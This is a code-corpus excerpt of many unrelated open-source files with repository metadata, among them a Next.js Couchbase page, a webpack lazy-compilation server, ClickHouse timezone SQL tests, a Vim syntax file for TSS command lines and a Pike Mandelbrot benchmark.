xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Unit_0">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2021-01-04T13:52:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
m
</Expression>
</UnitDefinition>
<UnitDefinition key="Unit_5" name="second" symbol="s">
<MiriamAnnotation>
<rdf:RDF
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Unit_4">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2021-01-04T13:52:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
s
</Expression>
</UnitDefinition>
<UnitDefinition key="Unit_13" name="Avogadro" symbol="Avogadro">
<MiriamAnnotation>
<rdf:RDF
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Unit_12">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2021-01-04T13:52:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
Avogadro
</Expression>
</UnitDefinition>
<UnitDefinition key="Unit_17" name="item" symbol="#">
<MiriamAnnotation>
<rdf:RDF
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Unit_16">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2021-01-04T13:52:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
#
</Expression>
</UnitDefinition>
<UnitDefinition key="Unit_35" name="liter" symbol="l">
<MiriamAnnotation>
<rdf:RDF
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Unit_34">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2021-01-04T13:52:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
0.001*m^3
</Expression>
</UnitDefinition>
<UnitDefinition key="Unit_41" name="mole" symbol="mol">
<MiriamAnnotation>
<rdf:RDF
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Unit_40">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2021-01-04T13:52:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
Avogadro*#
</Expression>
</UnitDefinition>
</ListOfUnitDefinitions>
</COPASI>
| Component Pascal | 5 | MedAnisse/COPASI | speed-test-suite/Ecoli_efm.cps | [
"Artistic-2.0"
] |
FancySpec describe: Matchers with: {
it: "matches with any value defined matching" when: {
m = Matchers MatchAny new: 1 with: 2
m === 0 is: false
m === 1 is: true
m === 2 is: true
m === 3 is_not: true
}
it: "matches only with all values defined matching" when: {
m = Matchers MatchAll new: Integer with: Fixnum
m === -1 is: true
m === 0 is: true
m === 1 is: true
m === 2.1 is_not: true
m === 0.0 is_not: true
}
}
| Fancy | 4 | bakkdoor/fancy | tests/matchers.fy | [
"BSD-3-Clause"
] |
import Head from 'next/head'
import styles from '../styles/Home.module.css'
import { connectToDatabase } from '../util/couchbase'
export default function Home({ isConnected }) {
return (
<div className={styles.container}>
<Head>
<title>Create Next App</title>
<link rel="icon" href="/favicon.ico" />
</Head>
<main className={styles.main}>
<h1 className={styles.title}>
Welcome to <a href="https://nextjs.org">Next.js with Couchbase!</a>
</h1>
{isConnected ? (
<h2 className={`${styles.subtitle} ${styles.green}`}>
You are connected to Couchbase
</h2>
) : (
<>
<h2 className={`${styles.subtitle} ${styles.red}`}>
You are NOT connected to Couchbase. Try refreshing the page, and
if this error persists check the <code>README.md</code> for
instructions.
</h2>
<em className={styles.center}>
Note: if the database was recently started, you might have to
re-start the app (in dev mode) or re-deploy to your serverless
environment for changes to take effect.
</em>
</>
)}
<p className={styles.description}>
Get started by editing{' '}
<code className={styles.code}>pages/index.js</code>
</p>
</main>
<footer className={styles.footer}>
<a
href="https://vercel.com?utm_source=create-next-app&utm_medium=default-template&utm_campaign=create-next-app"
target="_blank"
rel="noopener noreferrer"
>
Powered by{' '}
<img src="/vercel.svg" alt="Vercel Logo" className={styles.logo} />
</a>
</footer>
</div>
)
}
export async function getServerSideProps(context) {
let connection = await connectToDatabase()
const { collection } = connection
// Check connection with a KV GET operation for a key that doesnt exist
let isConnected = false
try {
await collection.get('testingConnectionKey')
} catch (err) {
// error message will return 'document not found' if and only if we are connected
// (but this document is not present, we're only trying to test the connection here)
if (err.message === 'document not found') {
isConnected = true
}
// if the error message is anything OTHER THAN 'document not found', the connection is broken
}
return {
props: { isConnected },
}
}
| JavaScript | 5 | blomqma/next.js | examples/with-couchbase/pages/index.js | [
"MIT"
] |
package {
public class TestOne {
{
trace("//TestOne class init");
}
function TestOne() {
trace("//TestOne constructor");
}
}
}
trace("//TestOne.as start");
import TestTwo;
new TestTwo();
trace("//TestOne.as end"); | ActionScript | 3 | Sprak1/ruffle | tests/tests/swfs/avm2/lazyinit/TestOne.as | [
"Apache-2.0",
"Unlicense"
] |
<article id="pricing" style="padding-top: 12rem; margin-top: -12rem;">
<aside></aside> <!-- spacing -->
<section>
<h2 class="full balanced spaced">PRICING</h2>
</section>
<aside></aside> <!-- spacing -->
</article>
<br style="--r:8">
<article>
<aside></aside> <!-- spacing -->
<section>
<div class="index-pricing xsmall">
<h2>100</h2><span>MB</span>
<b></b>
<p>FREE FOREVER</p>
</div>
</section>
<aside></aside> <!-- spacing -->
</article>
<br style="--r:8">
<article>
<aside></aside> <!-- spacing -->
<section class="pricing-grid">
<div class="index-pricing small">
<h2>10</h2><span>GB</span>
<b></b>
<p class="right">€ 3 / mo</p>
</div>
<b></b>
<div class="index-pricing medium">
<h2>400</h2><span>GB</span>
<b></b>
<p class="right">€ 9 / mo</p>
</div>
<b></b>
<div class="index-pricing large">
<h2>2000</h2><span>GB</span>
<b></b>
<p class="right">€ 27 / mo</p>
</div>
</section>
<aside></aside> <!-- spacing -->
</article> | Kit | 2 | pws1453/web-client | source/imports/www/index-pricing.kit | [
"MIT"
] |
ClearAll(mat,imat,idmat,a,b,c)
mat = [[1,2], [3,4]]
imat = Inverse(mat)
T imat == [[-2,1],[3/2,-1/2]]
T Dot([1,2,3], [a,b,c]) == a + 2b + 3c
idmat = IdentityMatrix(5)
T idmat == [[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1]]
T Dot(idmat, [1,2,3,4,5]) == [1,2,3,4,5]
T Dot([[a,b], [c,d]] , [e,f]) == [a*e + b*f,c*e + d*f]
T Transpose([[1,2,c], [3,4,5]]) == [[1,3],[2,4],[c,5]]
T Tr(IdentityMatrix(3)) == 3
T ZeroMatrix(3,2) == [[0,0],[0,0],[0,0]]
Transpose( [ [a,b], [c,d]] ) == [[a,c],[b,d]]
Eigenvalues( [ [a,b], [c,d]] ) == [[(1/2)*a + (1/2)*d + (-1/2)*((a^2 + 4b*c - 2a*d + d^2)^(1/2)),1],[(1/2)*a + (1/2)*d + (1/2)*((a^2 + 4b*c - 2a*d + d^2)^(1/2)),1]]
## FIXME: disabled this because
## 1. I commented out the artithmetic methods in sympy.jl becuase they conflict
## with new methods in PyCall
## 2. Inverse(mat) returns a List of python objects that are not translated
## by ToSymata. Another new thing, no doubt
# mat = [[a,b],[c,d]]
# T Simplify(Dot(mat,Inverse(mat))) == IdentityMatrix(2)
ClearAll(mat,imat,idmat,a,b,c,f,e,d)
| Objective-J | 4 | UnofficialJuliaMirrorSnapshots/Symata.jl-a906b1d5-d016-55c4-aab3-8a20cba0db2a | symata_test/linalg_test.sj | [
"MIT"
] |
Class {
#name : #GtTranscriptTextTaskAction,
#superclass : #BlTask,
#instVars : [
'editor'
],
#category : #'GToolkit-Transcript'
}
{ #category : #testing }
GtTranscriptTextTaskAction class >> isAbstract [
^ self name = #GtTranscriptTextTaskAction
]
{ #category : #accessing }
GtTranscriptTextTaskAction >> editor [
^ editor
]
{ #category : #accessing }
GtTranscriptTextTaskAction >> editor: anObject [
editor := anObject
]
| Smalltalk | 3 | markfirmware/gtoolkit | src/GToolkit-Transcript/GtTranscriptTextTaskAction.class.st | [
"MIT"
] |
extends /templates/common/table
block tableResultsHeader
tr
th(colspan=4)
span(data-i18n="general.results")
| Results
span
|: #{documents.length}
block tableHeader
tr
th(data-i18n="general.name") Name
th(data-i18n="general.description") Description
block tableBody
for course in documents
tr(class=course.get('creator') == me.id ? 'mine' : '')
td(title=course.get('name')).name-row
a(href="/editor/#{page}/#{course.get('slug') || course.id}")= course.get('name')
td(title=course.get('description')).description-row= course.get('description')
| Jade | 4 | cihatislamdede/codecombat | app/templates/editor/course/table.jade | [
"CC-BY-4.0",
"MIT"
] |
<%inherit file="/base.mako"/>
<%namespace file="/message.mako" import="render_msg" />
<%namespace file="/webapps/tool_shed/common/common.mako" import="*" />
<%def name="javascripts()">
${parent.javascripts()}
${common_misc_javascripts()}
</%def>
%if message:
${render_msg( message, status )}
%endif
<style type="text/css">
.state-ok {
background: #aff1af;
}
.state-error {
background: #f9c7c5;
}
.state-queued {
background: #eee;
}
.state-running {
background: #ffc;
}
</style>
<div class="warningmessage">
Resetting metadata may take a while because this process clones each change set in each selected repository's change log to a temporary location on disk.
Wait until this page redirects after clicking the <b>Reset metadata on selected repositories</b> button, as doing anything else will not be helpful. Watch
the tool shed paster log to pass the time if necessary.
</div>
<div class="toolForm">
<div class="toolFormTitle">Reset all metadata on each selected repository</div>
<%
if trans.user_is_admin:
controller = 'admin'
action = 'reset_metadata_on_selected_repositories_in_tool_shed'
else:
controller = 'repository'
action = 'reset_metadata_on_my_writable_repositories_in_tool_shed'
%>
<form name="reset_metadata_on_selected_repositories" id="reset_metadata_on_selected_repositories" action="${h.url_for( controller=controller, action=action )}" method="post" >
<div class="form-row">
Check each repository for which you want to reset metadata. Repository names are followed by owners in parentheses.
</div>
<div style="clear: both"></div>
<div class="form-row">
<input type="checkbox" id="checkAll" name="select_all_repositories_checkbox" value="true" onclick="checkAllRepositoryIdFields(1);"/><b>Select/unselect all repositories</b>
</div>
<div style="clear: both"></div>
<div class="form-row">
${render_select(repositories_select_field)}
</div>
<div style="clear: both"></div>
<div class="form-row">
<input type="submit" id="reset_metadata_button" name="reset_metadata_on_selected_repositories_button" value="Reset metadata on selected repositories"/>
</div>
</form>
</div>
</div>
<script type="text/javascript">
$('#reset_metadata_on_selected_repositories').submit(function(f) {
f.preventDefault();
var repository_ids = Array()
$('input:checked').each(function() {
if ($(this).id != 'checkAll') {
var repository_id = $(this).attr('value');
repository_ids.push(repository_id);
repo_div = $(this).parent();
repo_div.attr('class', 'state-queued');
}
});
for (var i = 0; i < repository_ids.length; i++) {
repository_id = repository_ids[i];
repo_elem = $("[value=" + repository_id + "]");
repo_div = repo_elem.parent();
repo_div.attr('class', 'state-running');
$.ajax({
type: 'POST',
url: '${h.url_for('/api/repositories/reset_metadata_on_repository')}',
data: { repository_id: repository_id },
dataType: "json"
}).always(function (data) {
repo_div.attr('class', 'state-' + data['status']);
if (data['status'] == 'error') {
repo_div.attr('title', data['repository_status'][0]);
}
});
};
});
</script>
| Mako | 4 | rikeshi/galaxy | lib/tool_shed/webapp/templates/webapps/tool_shed/common/reset_metadata_on_selected_repositories.mako | [
"CC-BY-3.0"
] |
// revisions:cfail1
fn combinator<T, const S: usize>() -> [T; S] {}
//[cfail1]~^ ERROR mismatched types
fn main() {
combinator().into_iter();
//[cfail1]~^ ERROR type annotations needed
}
| Rust | 3 | mbc-git/rust | src/test/incremental/const-generics/issue-64087.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
SELECT 'Pacific/Kiritimati', toDateTime('2020-01-02 03:04:05', 'Pacific/Kiritimati') AS x, toStartOfDay(x), toHour(x);
SELECT 'Africa/El_Aaiun', toDateTime('2020-01-02 03:04:05', 'Africa/El_Aaiun') AS x, toStartOfDay(x), toHour(x);
SELECT 'Asia/Pyongyang', toDateTime('2020-01-02 03:04:05', 'Asia/Pyongyang') AS x, toStartOfDay(x), toHour(x);
SELECT 'Pacific/Kwajalein', toDateTime('2020-01-02 03:04:05', 'Pacific/Kwajalein') AS x, toStartOfDay(x), toHour(x);
SELECT 'Pacific/Apia', toDateTime('2020-01-02 03:04:05', 'Pacific/Apia') AS x, toStartOfDay(x), toHour(x);
SELECT 'Pacific/Enderbury', toDateTime('2020-01-02 03:04:05', 'Pacific/Enderbury') AS x, toStartOfDay(x), toHour(x);
SELECT 'Pacific/Fakaofo', toDateTime('2020-01-02 03:04:05', 'Pacific/Fakaofo') AS x, toStartOfDay(x), toHour(x);
SELECT 'Pacific/Kiritimati', rand() as r, toHour(toDateTime(r, 'Pacific/Kiritimati') AS t) AS h, t, toTypeName(t) FROM numbers(1000000) WHERE h < 0 OR h > 23 ORDER BY h LIMIT 1 BY h;
SELECT 'Africa/El_Aaiun', rand() as r, toHour(toDateTime(r, 'Africa/El_Aaiun') AS t) AS h, t, toTypeName(t) FROM numbers(1000000) WHERE h < 0 OR h > 23 ORDER BY h LIMIT 1 BY h;
SELECT 'Asia/Pyongyang', rand() as r, toHour(toDateTime(r, 'Asia/Pyongyang') AS t) AS h, t, toTypeName(t) FROM numbers(1000000) WHERE h < 0 OR h > 23 ORDER BY h LIMIT 1 BY h;
SELECT 'Pacific/Kwajalein', rand() as r, toHour(toDateTime(r, 'Pacific/Kwajalein') AS t) AS h, t, toTypeName(t) FROM numbers(1000000) WHERE h < 0 OR h > 23 ORDER BY h LIMIT 1 BY h;
SELECT 'Pacific/Apia', rand() as r, toHour(toDateTime(r, 'Pacific/Apia') AS t) AS h, t, toTypeName(t) FROM numbers(1000000) WHERE h < 0 OR h > 23 ORDER BY h LIMIT 1 BY h;
SELECT 'Pacific/Enderbury', rand() as r, toHour(toDateTime(r, 'Pacific/Enderbury') AS t) AS h, t, toTypeName(t) FROM numbers(1000000) WHERE h < 0 OR h > 23 ORDER BY h LIMIT 1 BY h;
SELECT 'Pacific/Fakaofo', rand() as r, toHour(toDateTime(r, 'Pacific/Fakaofo') AS t) AS h, t, toTypeName(t) FROM numbers(1000000) WHERE h < 0 OR h > 23 ORDER BY h LIMIT 1 BY h;
| SQL | 4 | pdv-ru/ClickHouse | tests/queries/0_stateless/01252_weird_time_zone.sql | [
"Apache-2.0"
] |
/*
MIT License http://www.opensource.org/licenses/mit-license.php
Author Tobias Koppers @sokra
*/
"use strict";
/** @typedef {import("http").ServerOptions} HttpServerOptions */
/** @typedef {import("https").ServerOptions} HttpsServerOptions */
/** @typedef {import("../../declarations/WebpackOptions").LazyCompilationDefaultBackendOptions} LazyCompilationDefaultBackendOptions */
/** @typedef {import("../Compiler")} Compiler */
/**
* @callback BackendHandler
* @param {Compiler} compiler compiler
* @param {function(Error?, any?): void} callback callback
* @returns {void}
*/
/**
* @param {Omit<LazyCompilationDefaultBackendOptions, "client"> & { client: NonNullable<LazyCompilationDefaultBackendOptions["client"]>}} options additional options for the backend
* @returns {BackendHandler} backend
*/
module.exports = options => (compiler, callback) => {
const logger = compiler.getInfrastructureLogger("LazyCompilationBackend");
const activeModules = new Map();
const prefix = "/lazy-compilation-using-";
const isHttps =
options.protocol === "https" ||
(typeof options.server === "object" &&
("key" in options.server || "pfx" in options.server));
const createServer =
typeof options.server === "function"
? options.server
: (() => {
const http = isHttps ? require("https") : require("http");
return http.createServer.bind(http, options.server);
})();
const listen =
typeof options.listen === "function"
? options.listen
: server => {
let listen = options.listen;
if (typeof listen === "object" && !("port" in listen))
listen = { ...listen, port: undefined };
server.listen(listen);
};
const protocol = options.protocol || (isHttps ? "https" : "http");
const requestListener = (req, res) => {
const keys = req.url.slice(prefix.length).split("@");
req.socket.on("close", () => {
setTimeout(() => {
for (const key of keys) {
const oldValue = activeModules.get(key) || 0;
activeModules.set(key, oldValue - 1);
if (oldValue === 1) {
logger.log(
`${key} is no longer in use. Next compilation will skip this module.`
);
}
}
}, 120000);
});
req.socket.setNoDelay(true);
res.writeHead(200, {
"content-type": "text/event-stream",
"Access-Control-Allow-Origin": "*"
});
res.write("\n");
let moduleActivated = false;
for (const key of keys) {
const oldValue = activeModules.get(key) || 0;
activeModules.set(key, oldValue + 1);
if (oldValue === 0) {
logger.log(`${key} is now in use and will be compiled.`);
moduleActivated = true;
}
}
if (moduleActivated && compiler.watching) compiler.watching.invalidate();
};
const server = /** @type {import("net").Server} */ (createServer());
server.on("request", requestListener);
let isClosing = false;
/** @type {Set<import("net").Socket>} */
const sockets = new Set();
server.on("connection", socket => {
sockets.add(socket);
socket.on("close", () => {
sockets.delete(socket);
});
if (isClosing) socket.destroy();
});
server.on("clientError", e => {
if (e.message !== "Server is disposing") logger.warn(e);
});
server.on("listening", err => {
if (err) return callback(err);
const addr = server.address();
if (typeof addr === "string") throw new Error("addr must not be a string");
const urlBase =
addr.address === "::" || addr.address === "0.0.0.0"
? `${protocol}://localhost:${addr.port}`
: addr.family === "IPv6"
? `${protocol}://[${addr.address}]:${addr.port}`
: `${protocol}://${addr.address}:${addr.port}`;
logger.log(
`Server-Sent-Events server for lazy compilation open at ${urlBase}.`
);
callback(null, {
dispose(callback) {
isClosing = true;
// Removing the listener is a workaround for a memory leak in node.js
server.off("request", requestListener);
server.close(err => {
callback(err);
});
for (const socket of sockets) {
socket.destroy(new Error("Server is disposing"));
}
},
module(originalModule) {
const key = `${encodeURIComponent(
originalModule.identifier().replace(/\\/g, "/").replace(/@/g, "_")
).replace(/%(2F|3A|24|26|2B|2C|3B|3D|3A)/g, decodeURIComponent)}`;
const active = activeModules.get(key) > 0;
return {
client: `${options.client}?${encodeURIComponent(urlBase + prefix)}`,
data: key,
active
};
}
});
});
listen(server);
};
| JavaScript | 5 | vikusss/sub4.3 | node_modules/webpack/lib/hmr/lazyCompilationBackend.js | [
"MIT"
] |
- if branch.name == @project.repository.root_ref
.js-delete-branch-button{ data: { tooltip: s_('Branches|The default branch cannot be deleted'),
disabled: true.to_s } }
- elsif protected_branch?(@project, branch)
- if can?(current_user, :push_to_delete_protected_branch, @project)
.js-delete-branch-button{ data: { branch_name: branch.name,
is_protected_branch: true.to_s,
merged: merged.to_s,
default_branch_name: @project.repository.root_ref,
delete_path: project_branch_path(@project, branch.name) } }
- else
.js-delete-branch-button{ data: { is_protected_branch: true.to_s,
disabled: true.to_s } }
- else
.js-delete-branch-button{ data: { branch_name: branch.name,
merged: merged.to_s,
default_branch_name: @project.repository.root_ref,
delete_path: project_branch_path(@project, branch.name) } }
| Haml | 4 | Testiduk/gitlabhq | app/views/projects/branches/_delete_branch_modal_button.html.haml | [
"MIT"
] |
import structs/[ArrayList, HashMap]
fails := false
main: func {
stringString()
if (fails) {
"We've had failures" println()
exit(1)
}
"Pass" println()
}
stringString: func {
keys := [
"interpretation", "interpretations", "interpretative", "interpreted", "interpreting", "interpretive", "interprets", "misinterpret", "misinterpretation", "misinterpretations", "misinterpreted", "misinterpreting", "misinterprets", "reinterpret", "reinterpreted", "reinterprets", "reinterpreting", "reinterpretation", "reinterpretations", "deregulated", "deregulates", "deregulating", "deregulation", "regulated", "regulates", "regulating", "regulation","regulations", "regulator", "regulators", "regulatory", "unregulated", "revolutionary", "revolutionaries", "revolutionise", "revolutionised", "revolutionises", "revolutionising", "revolutionist", "revolutionists", "revolutions", "insignificant", "insignificantly", "significance", "significantly", "signified", "signifies", "signify", "signifying", "restructure", "restructured", "restructures", "restructuring", "structural", "structurally", "structured", "structures", "structuring", "unstructured", "invariable", "invariably", "variability", "variable", "variables", "variably", "variance", "variant", "variants", "variation", "variations", "varied", "varies", "varying", "violated", "violates", "violating", "violation", "violations"
] as ArrayList<String>
map := HashMap<String, String> new(1)
for (k in keys) {
map put(k, k)
}
ensure(map size, keys size, "map size")
for (k in keys) {
ensure(map contains?(k), true, "contains(#{k})")
ensure(map get(k), k, "get(#{k})")
}
for ((i, k) in map getKeys()) {
"%s | %s" printfln(k, keys[i])
}
map clear()
for (k in keys) {
ensure(map contains?(k), false)
}
ensure(map size, 0, "map size")
ensure(map getKeys() size, 0, "map keys size")
}
ensure: func ~str (a, b: String, desc := "") {
if (a != b) {
"Fail! '#{a}' should equal '#{b}' (#{desc})" println()
fails = true
}
}
ensure: func ~bool (a, b: Bool, desc := "") {
if (a != b) {
"Fail! '#{a}' should equal '#{b}' (#{desc})" println()
fails = true
}
}
ensure: func ~int (a, b: Int, desc := "") {
if (a != b) {
"Fail! '#{a}' should equal '#{b}' (#{desc})" println()
fails = true
}
}
| ooc | 4 | shamanas/rock | test/sdk/structs/hashmap_resize_test.ooc | [
"MIT"
] |
[Desktop Entry]
Name=YakYak
Comment=Chat client for Google Hangouts
GenericName=YakYak
Exec=/opt/yakyak/yakyak %U
Icon=yakyak
Terminal=false
Type=Application
StartupNotify=true
#StartupWMClass=YakYak
Keywords=hangouts;messenger
Categories=Network;InstantMessaging
X-GNOME-UsesNotifications=true
| desktop | 2 | cwonrails/yakyak | resources/linux/app.desktop | [
"MIT"
] |
<cfoutput>
<div class="row">
<div class="col-md-6 col-md-offset-3">
#panel(title="Request Password Reset")#
#includePartial("create")#
#panelend()#
</div>
</div>
</cfoutput> | ColdFusion | 2 | fintecheando/RoomBooking | views/passwordresets/new.cfm | [
"Apache-1.1"
] |
" Vim syntax file
" Language: TSS (Thermal Synthesizer System) Command Line
" Maintainer: Adrian Nagle, [email protected]
" Last Change: 2003 May 11
" Filenames: *.tsscl
" URL: http://www.naglenet.org/vim/syntax/tsscl.vim
" MAIN URL: http://www.naglenet.org/vim/
" quit when a syntax file was already loaded
if exists("b:current_syntax")
finish
endif
" Ignore case
syn case ignore
"
"
" Begin syntax definitions for tss geomtery file.
"
" Load TSS geometry syntax file
"source $VIM/myvim/tssgm.vim
"source $VIMRUNTIME/syntax/c.vim
" Define keywords for TSS
syn keyword tssclCommand begin radk list heatrates attr draw
syn keyword tssclKeyword cells rays error nodes levels objects cpu
syn keyword tssclKeyword units length positions energy time unit solar
syn keyword tssclKeyword solar_constant albedo planet_power
syn keyword tssclEnd exit
syn keyword tssclUnits cm feet meters inches
syn keyword tssclUnits Celsius Kelvin Fahrenheit Rankine
" Define matches for TSS
syn match tssclString /"[^"]\+"/ contains=ALLBUT,tssInteger,tssclKeyword,tssclCommand,tssclEnd,tssclUnits
syn match tssclComment "#.*$"
" rational and logical operators
" < Less than
" > Greater than
" <= Less than or equal
" >= Greater than or equal
" == or = Equal to
" != Not equal to
" && or & Logical AND
" || or | Logical OR
" ! Logical NOT
"
" algebraic operators:
" ^ or ** Exponentation
" * Multiplication
" / Division
" % Remainder
" + Addition
" - Subtraction
"
syn match tssclOper "||\||\|&&\|&\|!=\|!\|>=\|<=\|>\|<\|+\|-\|^\|\*\*\|\*\|/\|%\|==\|=\|\." skipwhite
" CLI Directive Commands, with arguments
"
" BASIC COMMAND LIST
" *ADD input_source
" *ARITHMETIC { [ON] | OFF }
" *CLOSE unit_number
" *CPU
" *DEFINE
" *ECHO[/qualifiers] { [ON] | OFF }
" *ELSE [IF { 0 | 1 } ]
" *END { IF | WHILE }
" *EXIT
" *IF { 0 | 1 }
" *LIST/n list variable
" *OPEN[/r | /r+ | /w | /w+ ] unit_number file_name
" *PROMPT prompt_string sybol_name
" *READ/unit=unit_number[/LOCAL | /GLOBAL ] sym1 [sym2, [sym3 ...]]
" *REWIND
" *STOP
" *STRCMP string_1 string_2 difference
" *SYSTEM command
" *UNDEFINE[/LOCAL][/GLOBAL] symbol_name
" *WHILE { 0 | 1 }
" *WRITE[/unit=unit_number] output text
"
syn match tssclDirective "\*ADD"
syn match tssclDirective "\*ARITHMETIC \+\(ON\|OFF\)"
syn match tssclDirective "\*CLOSE"
syn match tssclDirective "\*CPU"
syn match tssclDirective "\*DEFINE"
syn match tssclDirective "\*ECHO"
syn match tssclConditional "\*ELSE"
syn match tssclConditional "\*END \+\(IF\|WHILE\)"
syn match tssclDirective "\*EXIT"
syn match tssclConditional "\*IF"
syn match tssclDirective "\*LIST"
syn match tssclDirective "\*OPEN"
syn match tssclDirective "\*PROMPT"
syn match tssclDirective "\*READ"
syn match tssclDirective "\*REWIND"
syn match tssclDirective "\*STOP"
syn match tssclDirective "\*STRCMP"
syn match tssclDirective "\*SYSTEM"
syn match tssclDirective "\*UNDEFINE"
syn match tssclConditional "\*WHILE"
syn match tssclDirective "\*WRITE"
syn match tssclContChar "-$"
" C library functoins
" Bessel functions (jn, yn)
" Error and complementary error fuctions (erf, erfc)
" Exponential functions (exp)
" Logrithm (log, log10)
" Power (pow)
" Square root (sqrt)
" Floor (floor)
" Ceiling (ceil)
" Floating point remainder (fmod)
" Floating point absolute value (fabs)
" Gamma (gamma)
" Euclidean distance function (hypot)
" Hperbolic functions (sinh, cosh, tanh)
" Trigometric functions in radians (sin, cos, tan, asin, acos, atan, atan2)
" Trigometric functions in degrees (sind, cosd, tand, asind, acosd, atand,
" atan2d)
"
" local varialbles: cl_arg1, cl_arg2, etc. (cl_arg is an array of arguments)
" cl_args is the number of arguments
"
"
" I/O: *PROMPT, *WRITE, *READ
"
" Conditional branching:
" IF, ELSE IF, END
" *IF value *IF I==10
" *ELSE IF value *ELSE IF I<10
" *ELSE *ELSE
" *ENDIF *ENDIF
"
"
" Iterative looping:
" WHILE
" *WHILE test
" .....
" *END WHILE
"
"
" EXAMPLE:
" *DEFINE I = 1
" *WHILE (I <= 10)
" *WRITE I = 'I'
" *DEFINE I = (I + 1)
" *END WHILE
"
syn match tssclQualifier "/[^/ ]\+"hs=s+1
syn match tssclSymbol "'\S\+'"
"syn match tssclSymbol2 " \S\+ " contained
syn match tssclInteger "-\=\<[0-9]*\>"
syn match tssclFloat "-\=\<[0-9]*\.[0-9]*"
syn match tssclScientific "-\=\<[0-9]*\.[0-9]*E[-+]\=[0-9]\+\>"
" Define the default highlighting
" Only when an item doesn't have highlighting yet
hi def link tssclCommand Statement
hi def link tssclKeyword Special
hi def link tssclEnd Macro
hi def link tssclUnits Special
hi def link tssclComment Comment
hi def link tssclDirective Statement
hi def link tssclConditional Conditional
hi def link tssclContChar Macro
hi def link tssclQualifier Typedef
hi def link tssclSymbol Identifier
hi def link tssclSymbol2 Symbol
hi def link tssclString String
hi def link tssclOper Operator
hi def link tssclInteger Number
hi def link tssclFloat Number
hi def link tssclScientific Number
let b:current_syntax = "tsscl"
" vim: ts=8 sw=2
| VimL | 3 | uga-rosa/neovim | runtime/syntax/tsscl.vim | [
"Vim"
] |
package com.alibaba.json.bvt.fullSer;
import junit.framework.TestCase;
import org.junit.Assert;
import com.alibaba.fastjson.JSON;
import com.alibaba.json.bvt.fullSer.get_set_Test.VO;
public class getfTest extends TestCase {
public void test_codec() throws Exception {
VO vo = new VO();
vo.setfId(123);
String text = JSON.toJSONString(vo);
Assert.assertEquals("{\"fId\":123}", text);
VO vo1 = JSON.parseObject(text, VO.class);
Assert.assertEquals(123, vo1.getfId());
}
public static class VO {
private int fId;
public int getfId() {
return fId;
}
public void setfId(int fId) {
this.fId = fId;
}
}
}
| Java | 4 | Czarek93/fastjson | src/test/java/com/alibaba/json/bvt/fullSer/getfTest.java | [
"Apache-2.0"
] |
// ---------------------------------------------------------------------
// The Great Computer Language Shootout
// http://shootout.alioth.debian.org/
//
// Contributed by Anthony Borla
// ---------------------------------------------------------------------
int main(int argc, array(string) argv)
{
constant ITERATIONS = 50, LIMIT_SQR = 4.0;
int N = (int)argv[1]; int bit_num = 0, byte_acc = 0;
write("P4\n%d %d\n", N, N);
for (int y = 0; y < N; y++)
{
for (int x = 0; x < N; x++)
{
float ZR = 0.0, ZI = 0.0, TR = 0.0, TI = 0.0;
float CR = (2.0 * x / N) - 1.5, CI = (2.0 * y / N) - 1.0;
int ESCAPE = 0;
for (int i = 0; i < ITERATIONS; i++)
{
TR = ZR * ZR - ZI * ZI + CR; TI = 2.0 * ZR * ZI + CI;
ZR = TR; ZI = TI;
if (ZR * ZR + ZI * ZI > LIMIT_SQR) { ESCAPE = 1; break; }
}
byte_acc = (byte_acc << 1) | (ESCAPE ? 0 : 1); bit_num++;
if (bit_num == 8)
{
write("%c", byte_acc); byte_acc = bit_num = 0;
}
else if (x == N - 1)
{
byte_acc <<= (8 - bit_num); write("%c", byte_acc);
byte_acc = bit_num = 0;
}
}
}
return 0;
}
| Pike | 4 | kragen/shootout | bench/mandelbrot/mandelbrot.pike | [
"BSD-3-Clause"
] |
- dashboard: issue_details
title: Issue Details
layout: newspaper
load_configuration: wait
elements:
- title: Issue Severity
name: Issue Severity
model: jira_block
explore: issue_extended
type: single_value
fields:
- issue_extended.severity_name
sorts:
- issue_extended.severity_name
limit: 500
column_limit: 50
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
